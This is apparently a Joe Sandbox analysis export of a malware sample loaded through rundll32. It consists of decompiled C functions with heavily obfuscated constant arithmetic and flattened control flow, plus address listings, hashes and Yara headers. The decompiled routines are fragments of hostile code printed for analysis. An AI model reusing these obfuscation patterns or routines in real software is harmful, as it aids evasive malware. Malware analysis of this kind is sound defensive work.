                                                                                                                      0x0035d196
                                                                                                                      0x0035d0e0
                                                                                                                      0x0035d0e0
                                                                                                                      0x00000000
                                                                                                                      0x0035d0e0
                                                                                                                      0x0035d076
                                                                                                                      0x0035d07c
                                                                                                                      0x00000000
                                                                                                                      0x0035d082
                                                                                                                      0x0035d082
                                                                                                                      0x00000000
                                                                                                                      0x0035d082
                                                                                                                      0x0035d07c
                                                                                                                      0x0035d074
                                                                                                                      0x0035d068
                                                                                                                      0x0035d1b7
                                                                                                                      0x0035d1c0
                                                                                                                      0x0035d1c0
                                                                                                                      0x0035d149
                                                                                                                      0x0035d15e
                                                                                                                      0x0035d163
                                                                                                                      0x0035d16a
                                                                                                                      0x0035d176
                                                                                                                      0x00000000
                                                                                                                      0x0035d16c
                                                                                                                      0x0035d16c
                                                                                                                      0x00000000
                                                                                                                      0x0035d16c
                                                                                                                      0x00000000
                                                                                                                      0x0035d17b
                                                                                                                      0x0035d17b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: a028a464876d9dfaab94ff48c6aafa205fc57f9bdf1035d701871a6ce204ab31
                                                                                                                      • Instruction ID: 7bfeb177cc9d25e837645132de43434809be0a478d279481b816277c230c2998
                                                                                                                      • Opcode Fuzzy Hash: a028a464876d9dfaab94ff48c6aafa205fc57f9bdf1035d701871a6ce204ab31
                                                                                                                      • Instruction Fuzzy Hash: 99D120B21083819FD764CF66C94991BFBE1FBC4748F10891DF6968A260C7B69949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034C309 Relevance: 5.2, Strings: 4, Instructions: 174COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0034C309() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _t177;
				void* _t180;
				void* _t183;
				intOrPtr _t190;
				intOrPtr _t192;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t213;

				_t213 =  &_v604;
				_v528 = _v528 & 0x00000000;
				_v532 = 0xe4831e;
				_t183 = 0x6eb28ed;
				_v552 = 0x1276c3;
				_v552 = _v552 ^ 0x42b4d72c;
				_v552 = _v552 + 0xf95f;
				_v552 = _v552 ^ 0x42a4cd0b;
				_v548 = 0x347a6a;
				_v548 = _v548 | 0x3256b11b;
				_v548 = _v548 ^ 0x3277037e;
				_v564 = 0x82dd46;
				_v564 = _v564 + 0xffffb28a;
				_v564 = _v564 << 0xf;
				_v564 = _v564 ^ 0x47e00e04;
				_v600 = 0xaa25ff;
				_v600 = _v600 << 0xd;
				_v600 = _v600 + 0xf5f3;
				_v600 = _v600 + 0xffff8f6c;
				_v600 = _v600 ^ 0x44cc5d5c;
				_v556 = 0x1132ac;
				_v556 = _v556 | 0x9b4d5b2d;
				_v556 = _v556 ^ 0x2eadc533;
				_v556 = _v556 ^ 0xb5fd7d8d;
				_v536 = 0x11628e;
				_v536 = _v536 * 0x4b;
				_v536 = _v536 ^ 0x051afcb6;
				_v584 = 0xa15265;
				_v584 = _v584 << 9;
				_t208 = 0x76;
				_v584 = _v584 / _t208;
				_t209 = 0x44;
				_v584 = _v584 * 0x30;
				_v584 = _v584 ^ 0x1b1be586;
				_v576 = 0xad5a3e;
				_v576 = _v576 | 0x6c06410f;
				_v576 = _v576 * 0xe;
				_v576 = _v576 ^ 0xf19bc2b8;
				_v540 = 0x7faa4f;
				_v540 = _v540 + 0xffff807e;
				_v540 = _v540 ^ 0x007d47f3;
				_v544 = 0x15cbe5;
				_v544 = _v544 | 0x222269e9;
				_v544 = _v544 ^ 0x2236b88c;
				_v592 = 0x7f48ca;
				_v592 = _v592 << 3;
				_v592 = _v592 / _t209;
				_v592 = _v592 | 0x6974e558;
				_v592 = _v592 ^ 0x697a9c68;
				_v568 = 0xdf464;
				_v568 = _v568 << 0xf;
				_v568 = _v568 | 0x68444ee0;
				_v568 = _v568 ^ 0xfa71a6c1;
				_v588 = 0x4eabc7;
				_v588 = _v588 >> 4;
				_v588 = _v588 ^ 0xdf4d904b;
				_v588 = _v588 + 0x3b02;
				_v588 = _v588 ^ 0xdf416162;
				_v596 = 0x2da8e3;
				_v596 = _v596 | 0xcaed8666;
				_v596 = _v596 + 0xffff0300;
				_v596 = _v596 ^ 0x5b73fee0;
				_v596 = _v596 ^ 0x9196765f;
				_v604 = 0x945bcd;
				_v604 = _v604 + 0xffffdd7c;
				_v604 = _v604 | 0x6dfc281c;
				_v604 = _v604 << 3;
				_v604 = _v604 ^ 0x6fe21eca;
				_v580 = 0xe4e766;
				_t122 =  &_v580; // 0xe4e766
				_t210 = 0x1c;
				_t177 =  *_t122 / _t210;
				_v580 = _t177;
				_v580 = _v580 + 0x73a9;
				_v580 = _v580 | 0xb028f1fa;
				_v580 = _v580 ^ 0xb0236f0a;
				_v572 = 0x26d4cb;
				_v572 = _v572 ^ 0xbda42e04;
				_v572 = _v572 << 8;
				_v572 = _v572 ^ 0x82f622a5;
				_v560 = 0x78c236;
				_v560 = _v560 | 0xc7202908;
				_v560 = _v560 >> 9;
				_v560 = _v560 ^ 0x0065a40e;
				do {
					while(_t183 != 0x6eb28ed) {
						if(_t183 == 0x7fdcf56) {
							return E00341950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E0035D3C8, _v560);
						}
						if(_t183 == 0xb7324ef) {
							_t177 = E00354FA8(_v588,  &_v524, _v596, _v604);
							 *_t177 = 0;
							_t183 = 0x7fdcf56;
							continue;
						}
						_t220 = _t183 - 0xb9bc25f;
						if(_t183 != 0xb9bc25f) {
							goto L8;
						}
						_push(_v600);
						_push(_v564);
						_push(0x3410cc);
						_t180 = E0034AB66(_v552, _v548, _t220);
						_t190 =  *0x36520c; // 0x0
						_t192 =  *0x36520c; // 0x0
						E0034E7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
						_t177 = E0034AE03(_v544, _v592, _v568, _t180);
						_t213 =  &(_t213[0xd]);
						_t183 = 0xb7324ef;
					}
					_t183 = 0xb9bc25f;
					L8:
					__eflags = _t183 - 0x6d02df3;
				} while (__eflags != 0);
				return _t177;
			}

































                                                                                                                      0x0034c309
                                                                                                                      0x0034c313
                                                                                                                      0x0034c31a
                                                                                                                      0x0034c322
                                                                                                                      0x0034c327
                                                                                                                      0x0034c32f
                                                                                                                      0x0034c337
                                                                                                                      0x0034c33f
                                                                                                                      0x0034c347
                                                                                                                      0x0034c34f
                                                                                                                      0x0034c357
                                                                                                                      0x0034c35f
                                                                                                                      0x0034c367
                                                                                                                      0x0034c36f
                                                                                                                      0x0034c374
                                                                                                                      0x0034c37c
                                                                                                                      0x0034c384
                                                                                                                      0x0034c389
                                                                                                                      0x0034c391
                                                                                                                      0x0034c399
                                                                                                                      0x0034c3a1
                                                                                                                      0x0034c3a9
                                                                                                                      0x0034c3b1
                                                                                                                      0x0034c3b9
                                                                                                                      0x0034c3c1
                                                                                                                      0x0034c3ce
                                                                                                                      0x0034c3d2
                                                                                                                      0x0034c3da
                                                                                                                      0x0034c3e2
                                                                                                                      0x0034c3ed
                                                                                                                      0x0034c3f2
                                                                                                                      0x0034c3fd
                                                                                                                      0x0034c3fe
                                                                                                                      0x0034c402
                                                                                                                      0x0034c40a
                                                                                                                      0x0034c412
                                                                                                                      0x0034c41f
                                                                                                                      0x0034c423
                                                                                                                      0x0034c42b
                                                                                                                      0x0034c433
                                                                                                                      0x0034c43b
                                                                                                                      0x0034c443
                                                                                                                      0x0034c44b
                                                                                                                      0x0034c453
                                                                                                                      0x0034c45b
                                                                                                                      0x0034c463
                                                                                                                      0x0034c46e
                                                                                                                      0x0034c472
                                                                                                                      0x0034c47a
                                                                                                                      0x0034c482
                                                                                                                      0x0034c48a
                                                                                                                      0x0034c48f
                                                                                                                      0x0034c497
                                                                                                                      0x0034c49f
                                                                                                                      0x0034c4a7
                                                                                                                      0x0034c4ac
                                                                                                                      0x0034c4b4
                                                                                                                      0x0034c4bc
                                                                                                                      0x0034c4c4
                                                                                                                      0x0034c4cc
                                                                                                                      0x0034c4d4
                                                                                                                      0x0034c4dc
                                                                                                                      0x0034c4e4
                                                                                                                      0x0034c4ec
                                                                                                                      0x0034c4f4
                                                                                                                      0x0034c4fc
                                                                                                                      0x0034c504
                                                                                                                      0x0034c509
                                                                                                                      0x0034c513
                                                                                                                      0x0034c520
                                                                                                                      0x0034c52b
                                                                                                                      0x0034c52c
                                                                                                                      0x0034c533
                                                                                                                      0x0034c537
                                                                                                                      0x0034c53f
                                                                                                                      0x0034c547
                                                                                                                      0x0034c54f
                                                                                                                      0x0034c557
                                                                                                                      0x0034c55f
                                                                                                                      0x0034c564
                                                                                                                      0x0034c56c
                                                                                                                      0x0034c574
                                                                                                                      0x0034c57c
                                                                                                                      0x0034c581
                                                                                                                      0x0034c589
                                                                                                                      0x0034c589
                                                                                                                      0x0034c597
                                                                                                                      0x00000000
                                                                                                                      0x0034c66f
                                                                                                                      0x0034c59f
                                                                                                                      0x0034c62e
                                                                                                                      0x0034c637
                                                                                                                      0x0034c63a
                                                                                                                      0x00000000
                                                                                                                      0x0034c63a
                                                                                                                      0x0034c5a1
                                                                                                                      0x0034c5a3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c5a9
                                                                                                                      0x0034c5ad
                                                                                                                      0x0034c5b9
                                                                                                                      0x0034c5be
                                                                                                                      0x0034c5c3
                                                                                                                      0x0034c5e8
                                                                                                                      0x0034c5fd
                                                                                                                      0x0034c60f
                                                                                                                      0x0034c614
                                                                                                                      0x0034c617
                                                                                                                      0x0034c617
                                                                                                                      0x0034c641
                                                                                                                      0x0034c643
                                                                                                                      0x0034c643
                                                                                                                      0x0034c643
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$NDh$i""
                                                                                                                      • API String ID: 0-1187746982
                                                                                                                      • Opcode ID: 36ef62d7f512901be6f7d33270ee0ca2535971948e4278b5229835256e01fe8c
                                                                                                                      • Instruction ID: 6fac59694d485036e1c7a2ea4fade683914ea2248176eff55461712c87fd5d2a
                                                                                                                      • Opcode Fuzzy Hash: 36ef62d7f512901be6f7d33270ee0ca2535971948e4278b5229835256e01fe8c
                                                                                                                      • Instruction Fuzzy Hash: 6A813F710093419FC399CF61DA8A51FBBE1FBC4758F109A1DF2969A260D3B49A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035A156 Relevance: 5.2, Strings: 4, Instructions: 170COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0035A156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t133;
				signed int _t146;
				void* _t147;
				void* _t155;
				char* _t156;
				void* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int* _t183;

				_push(_a12);
				_t174 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t133);
				_v132 = _v132 & 0x00000000;
				_t183 =  &(( &_v196)[5]);
				_v136 = 0x446ea7;
				_v180 = 0x28766d;
				_t155 = 0x8ee0430;
				_v180 = _v180 | 0x8061b26e;
				_t175 = 0x7a;
				_v180 = _v180 / _t175;
				_v180 = _v180 ^ 0x0107c2a1;
				_v160 = 0x181348;
				_t176 = 0x24;
				_v160 = _v160 / _t176;
				_v160 = _v160 ^ 0x00002248;
				_v192 = 0xf13979;
				_v192 = _v192 + 0xffff8439;
				_v192 = _v192 << 0xb;
				_v192 = _v192 + 0x337f;
				_v192 = _v192 ^ 0x85ec5d3f;
				_v148 = 0x5e6289;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x00022a63;
				_v184 = 0xe3b806;
				_v184 = _v184 + 0xc2d8;
				_v184 = _v184 | 0x759fad77;
				_v184 = _v184 ^ 0x75f287c1;
				_v168 = 0x566c5d;
				_v168 = _v168 ^ 0x750ff463;
				_v168 = _v168 ^ 0x75584e2a;
				_v152 = 0x83e247;
				_v152 = _v152 ^ 0x81f90c1d;
				_v152 = _v152 ^ 0x81706586;
				_v188 = 0x5c5a6b;
				_v188 = _v188 >> 9;
				_v188 = _v188 << 0xb;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x00030e37;
				_v176 = 0xc154a1;
				_v176 = _v176 | 0xc3f8b8be;
				_t177 = 0x3c;
				_v176 = _v176 * 0x16;
				_v176 = _v176 ^ 0xd77414a9;
				_v164 = 0x5dd26c;
				_v164 = _v164 * 0x18;
				_v164 = _v164 ^ 0x08c2b6d4;
				_v144 = 0x980588;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04c0143e;
				_v196 = 0xd24b78;
				_v196 = _v196 * 0xf;
				_v196 = _v196 * 7;
				_v196 = _v196 / _t177;
				_v196 = _v196 ^ 0x017222e8;
				_v156 = 0x8c94fd;
				_v156 = _v156 + 0xffff8671;
				_v156 = _v156 ^ 0x0082913e;
				_v172 = 0x17d6e;
				_t178 = 0x63;
				_t146 = _v172 / _t178;
				_v172 = _t146;
				_v172 = _v172 + 0x20ae;
				_v172 = _v172 ^ 0x00044ed7;
				do {
					while(_t155 != 0x2e9bf4f) {
						if(_t155 == 0x570f58c) {
							_push(0x341494);
							_push(_v168);
							_t147 = E0034BB4B(_v148, _v184, __eflags);
							E0035D1C1(__eflags, _t174, _v188, _v176, _t147, E0034F154(__eflags), _v164, _v144);
							return E0034AE03(_v196, _v156, _v172, _t147);
						}
						if(_t155 == 0x8ee0430) {
							_t155 = 0xffbee7a;
							continue;
						}
						if(_t155 != 0xffbee7a) {
							goto L17;
						}
						_v140 = 0x80;
						_t146 = E00353F73(_v180, _v160,  &_v140, _v192,  &_v128);
						_t183 =  &(_t183[3]);
						_t155 = 0x2e9bf4f;
					}
					__eflags = _v128;
					_t156 =  &_v128;
					if(_v128 == 0) {
						L16:
						_t155 = 0x570f58c;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t146 =  *_t156;
						__eflags = _t146 - 0x30;
						if(_t146 < 0x30) {
							L10:
							__eflags = _t146 - 0x61;
							if(_t146 < 0x61) {
								L12:
								__eflags = _t146 - 0x41;
								if(_t146 < 0x41) {
									L14:
									 *_t156 = 0x58;
									goto L15;
								}
								__eflags = _t146 - 0x5a;
								if(_t146 <= 0x5a) {
									goto L15;
								}
								goto L14;
							}
							__eflags = _t146 - 0x7a;
							if(_t146 <= 0x7a) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t146 - 0x39;
						if(_t146 <= 0x39) {
							goto L15;
						}
						goto L10;
						L15:
						_t156 = _t156 + 1;
						__eflags =  *_t156;
					} while ( *_t156 != 0);
					goto L16;
					L17:
					__eflags = _t155 - 0x55e4d43;
				} while (__eflags != 0);
				return _t146;
			}
































                                                                                                                      0x0035a160
                                                                                                                      0x0035a167
                                                                                                                      0x0035a169
                                                                                                                      0x0035a170
                                                                                                                      0x0035a177
                                                                                                                      0x0035a178
                                                                                                                      0x0035a179
                                                                                                                      0x0035a17e
                                                                                                                      0x0035a183
                                                                                                                      0x0035a186
                                                                                                                      0x0035a190
                                                                                                                      0x0035a198
                                                                                                                      0x0035a19d
                                                                                                                      0x0035a1ab
                                                                                                                      0x0035a1b0
                                                                                                                      0x0035a1b6
                                                                                                                      0x0035a1be
                                                                                                                      0x0035a1ca
                                                                                                                      0x0035a1cf
                                                                                                                      0x0035a1d5
                                                                                                                      0x0035a1dd
                                                                                                                      0x0035a1e5
                                                                                                                      0x0035a1ed
                                                                                                                      0x0035a1f2
                                                                                                                      0x0035a1fa
                                                                                                                      0x0035a202
                                                                                                                      0x0035a20a
                                                                                                                      0x0035a20f
                                                                                                                      0x0035a217
                                                                                                                      0x0035a21f
                                                                                                                      0x0035a227
                                                                                                                      0x0035a22f
                                                                                                                      0x0035a237
                                                                                                                      0x0035a23f
                                                                                                                      0x0035a247
                                                                                                                      0x0035a24f
                                                                                                                      0x0035a257
                                                                                                                      0x0035a25f
                                                                                                                      0x0035a267
                                                                                                                      0x0035a26f
                                                                                                                      0x0035a274
                                                                                                                      0x0035a279
                                                                                                                      0x0035a27e
                                                                                                                      0x0035a286
                                                                                                                      0x0035a28e
                                                                                                                      0x0035a29b
                                                                                                                      0x0035a29c
                                                                                                                      0x0035a2a0
                                                                                                                      0x0035a2a8
                                                                                                                      0x0035a2b5
                                                                                                                      0x0035a2b9
                                                                                                                      0x0035a2c1
                                                                                                                      0x0035a2c9
                                                                                                                      0x0035a2ce
                                                                                                                      0x0035a2d6
                                                                                                                      0x0035a2e3
                                                                                                                      0x0035a2ec
                                                                                                                      0x0035a2f6
                                                                                                                      0x0035a2fa
                                                                                                                      0x0035a302
                                                                                                                      0x0035a30a
                                                                                                                      0x0035a312
                                                                                                                      0x0035a31c
                                                                                                                      0x0035a334
                                                                                                                      0x0035a335
                                                                                                                      0x0035a33c
                                                                                                                      0x0035a340
                                                                                                                      0x0035a348
                                                                                                                      0x0035a350
                                                                                                                      0x0035a350
                                                                                                                      0x0035a356
                                                                                                                      0x0035a3cc
                                                                                                                      0x0035a3d1
                                                                                                                      0x0035a3dd
                                                                                                                      0x0035a404
                                                                                                                      0x00000000
                                                                                                                      0x0035a41b
                                                                                                                      0x0035a35e
                                                                                                                      0x0035a38e
                                                                                                                      0x00000000
                                                                                                                      0x0035a38e
                                                                                                                      0x0035a362
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a368
                                                                                                                      0x0035a382
                                                                                                                      0x0035a387
                                                                                                                      0x0035a38a
                                                                                                                      0x0035a38a
                                                                                                                      0x0035a392
                                                                                                                      0x0035a397
                                                                                                                      0x0035a39b
                                                                                                                      0x0035a3c0
                                                                                                                      0x0035a3c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39f
                                                                                                                      0x0035a3a1
                                                                                                                      0x0035a3a7
                                                                                                                      0x0035a3a7
                                                                                                                      0x0035a3a9
                                                                                                                      0x0035a3af
                                                                                                                      0x0035a3af
                                                                                                                      0x0035a3b1
                                                                                                                      0x0035a3b7
                                                                                                                      0x0035a3b7
                                                                                                                      0x00000000
                                                                                                                      0x0035a3b7
                                                                                                                      0x0035a3b3
                                                                                                                      0x0035a3b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3b5
                                                                                                                      0x0035a3ab
                                                                                                                      0x0035a3ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3ad
                                                                                                                      0x0035a3a3
                                                                                                                      0x0035a3a5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3ba
                                                                                                                      0x0035a3ba
                                                                                                                      0x0035a3bb
                                                                                                                      0x0035a3bb
                                                                                                                      0x00000000
                                                                                                                      0x0035a3c2
                                                                                                                      0x0035a3c2
                                                                                                                      0x0035a3c2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: fe5adfc32565a970a879555416db85d39424805267ad3011b1bf0be04e0d7060
                                                                                                                      • Instruction ID: 807885620475d6db501746132095537d9f3304ec858010b980245903284e97a0
                                                                                                                      • Opcode Fuzzy Hash: fe5adfc32565a970a879555416db85d39424805267ad3011b1bf0be04e0d7060
                                                                                                                      • Instruction Fuzzy Hash: 6E7164754083809BC769CE25C489A1FBBF2BBC5758F505A0DF8869A260C3B5CA49CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034F58F Relevance: 5.2, Strings: 4, Instructions: 166COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0034F58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v560;
				char _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t129;
				signed int _t143;
				signed int _t144;
				void* _t151;
				signed int _t155;
				char _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int* _t181;

				_push(_a12);
				_t173 = _a4;
				_push(_a8);
				_push(_t173);
				_push(E00360CF5);
				_push(__ecx);
				E0034CF25(_t129);
				_v660 = 0x8d8445;
				_t181 =  &(( &_v680)[5]);
				_t151 = 0x740f7fb;
				_t174 = 0x71;
				_v660 = _v660 / _t174;
				_v660 = _v660 ^ 0x128b90b3;
				_v660 = _v660 ^ 0x128ad02b;
				_v640 = 0x9067b5;
				_v640 = _v640 + 0x286c;
				_v640 = _v640 ^ 0x00975038;
				_v632 = 0x5011ea;
				_v632 = _v632 + 0xffff22a1;
				_v632 = _v632 ^ 0x00475e04;
				_v628 = 0xc0b5ed;
				_v628 = _v628 | 0x09c79ac0;
				_v628 = _v628 ^ 0x09cd8243;
				_v652 = 0x6be172;
				_v652 = _v652 << 0xe;
				_v652 = _v652 ^ 0xf9ae6093;
				_v652 = _v652 ^ 0x01f8093d;
				_v644 = 0xbd5efb;
				_v644 = _v644 << 3;
				_v644 = _v644 ^ 0x05e3f72f;
				_v656 = 0xc95ad0;
				_t175 = 0x15;
				_v656 = _v656 / _t175;
				_v656 = _v656 | 0xa2f71cc0;
				_v656 = _v656 ^ 0xa2f780bc;
				_v676 = 0xbb6512;
				_v676 = _v676 << 0x10;
				_v676 = _v676 ^ 0x67ff039f;
				_v676 = _v676 + 0xffff3430;
				_v676 = _v676 ^ 0x02e7c46b;
				_v636 = 0x771a54;
				_v636 = _v636 >> 0xf;
				_v636 = _v636 ^ 0x000f324c;
				_v680 = 0x44376b;
				_v680 = _v680 + 0xffff61f8;
				_v680 = _v680 + 0xffff924c;
				_v680 = _v680 << 0xc;
				_v680 = _v680 ^ 0x32b3ed2b;
				_v672 = 0x492cee;
				_v672 = _v672 | 0xff7fdef6;
				_v672 = _v672 ^ 0xff79836a;
				_v664 = 0x821e3f;
				_v664 = _v664 + 0xffff0102;
				_v664 = _v664 << 0xd;
				_v664 = _v664 ^ 0x23edf1fd;
				_v648 = 0xfa5772;
				_v648 = _v648 + 0x1fee;
				_v648 = _v648 ^ 0x00f8d439;
				_v668 = 0x765780;
				_t176 = 0x5a;
				_v668 = _v668 / _t176;
				_t177 = 0x7e;
				_t178 = _v648;
				_v668 = _v668 / _t177;
				_v668 = _v668 ^ 0x0009a212;
				L1:
				while(_t151 != 0x4c653bf) {
					if(_t151 == 0x50dca7b) {
						_v560 = 0x22c;
						_t144 = E00360296( &_v560, _v644, _t178, _v656, _v676);
						_t181 =  &(_t181[3]);
						L10:
						asm("sbb ecx, ecx");
						_t155 =  ~_t144 & 0x074f90c1;
						L8:
						_t151 = _t155 + 0x59cade0;
						continue;
					}
					if(_t151 == 0x59cade0) {
						return E00354DAD(_v672, _v664, _t178, _v648, _v668);
					}
					if(_t151 == 0x740f7fb) {
						_v624 = _t173;
						_t151 = 0x4c653bf;
						continue;
					}
					if(_t151 == 0xc1665e4) {
						_t144 = E0035E3F7(_v636, _t178,  &_v560, _v680);
						goto L10;
					}
					_t190 = _t151 - 0xcec3ea1;
					if(_t151 != 0xcec3ea1) {
						L16:
						__eflags = _t151 - 0x2876c78;
						if(__eflags != 0) {
							continue;
						}
						return _t144;
					}
					_t144 = E00360CF5(_t151, _t190,  &_v560,  &_v624);
					asm("sbb ecx, ecx");
					_t155 =  ~_t144 & 0x0679b804;
					goto L8;
				}
				_t143 = E00343C3B(_t151, _v660);
				_t178 = _t143;
				_t181 = _t181 - 0xc + 0x10;
				__eflags = _t143 - 0xffffffff;
				if(__eflags == 0) {
					_t151 = 0x2876c78;
					goto L16;
				}
				_t151 = 0x50dca7b;
				goto L1;
			}






























                                                                                                                      0x0034f599
                                                                                                                      0x0034f5a0
                                                                                                                      0x0034f5a7
                                                                                                                      0x0034f5ae
                                                                                                                      0x0034f5af
                                                                                                                      0x0034f5b4
                                                                                                                      0x0034f5b5
                                                                                                                      0x0034f5ba
                                                                                                                      0x0034f5c2
                                                                                                                      0x0034f5cb
                                                                                                                      0x0034f5d2
                                                                                                                      0x0034f5d7
                                                                                                                      0x0034f5dd
                                                                                                                      0x0034f5e5
                                                                                                                      0x0034f5ed
                                                                                                                      0x0034f5f5
                                                                                                                      0x0034f5fd
                                                                                                                      0x0034f605
                                                                                                                      0x0034f60d
                                                                                                                      0x0034f615
                                                                                                                      0x0034f61d
                                                                                                                      0x0034f625
                                                                                                                      0x0034f62d
                                                                                                                      0x0034f635
                                                                                                                      0x0034f63d
                                                                                                                      0x0034f642
                                                                                                                      0x0034f64a
                                                                                                                      0x0034f652
                                                                                                                      0x0034f65a
                                                                                                                      0x0034f65f
                                                                                                                      0x0034f667
                                                                                                                      0x0034f673
                                                                                                                      0x0034f678
                                                                                                                      0x0034f67e
                                                                                                                      0x0034f686
                                                                                                                      0x0034f68e
                                                                                                                      0x0034f696
                                                                                                                      0x0034f69b
                                                                                                                      0x0034f6a3
                                                                                                                      0x0034f6ab
                                                                                                                      0x0034f6b3
                                                                                                                      0x0034f6bb
                                                                                                                      0x0034f6c0
                                                                                                                      0x0034f6c8
                                                                                                                      0x0034f6d0
                                                                                                                      0x0034f6d8
                                                                                                                      0x0034f6e0
                                                                                                                      0x0034f6e5
                                                                                                                      0x0034f6ed
                                                                                                                      0x0034f6f5
                                                                                                                      0x0034f6fd
                                                                                                                      0x0034f705
                                                                                                                      0x0034f70d
                                                                                                                      0x0034f715
                                                                                                                      0x0034f71a
                                                                                                                      0x0034f722
                                                                                                                      0x0034f72a
                                                                                                                      0x0034f732
                                                                                                                      0x0034f73a
                                                                                                                      0x0034f746
                                                                                                                      0x0034f74b
                                                                                                                      0x0034f755
                                                                                                                      0x0034f758
                                                                                                                      0x0034f761
                                                                                                                      0x0034f76a
                                                                                                                      0x00000000
                                                                                                                      0x0034f772
                                                                                                                      0x0034f780
                                                                                                                      0x0034f805
                                                                                                                      0x0034f819
                                                                                                                      0x0034f81e
                                                                                                                      0x0034f7e1
                                                                                                                      0x0034f7e5
                                                                                                                      0x0034f7e7
                                                                                                                      0x0034f7c4
                                                                                                                      0x0034f7c4
                                                                                                                      0x00000000
                                                                                                                      0x0034f7c4
                                                                                                                      0x0034f784
                                                                                                                      0x00000000
                                                                                                                      0x0034f87c
                                                                                                                      0x0034f790
                                                                                                                      0x0034f7ef
                                                                                                                      0x0034f7f3
                                                                                                                      0x00000000
                                                                                                                      0x0034f7f3
                                                                                                                      0x0034f798
                                                                                                                      0x0034f7da
                                                                                                                      0x00000000
                                                                                                                      0x0034f7e0
                                                                                                                      0x0034f79a
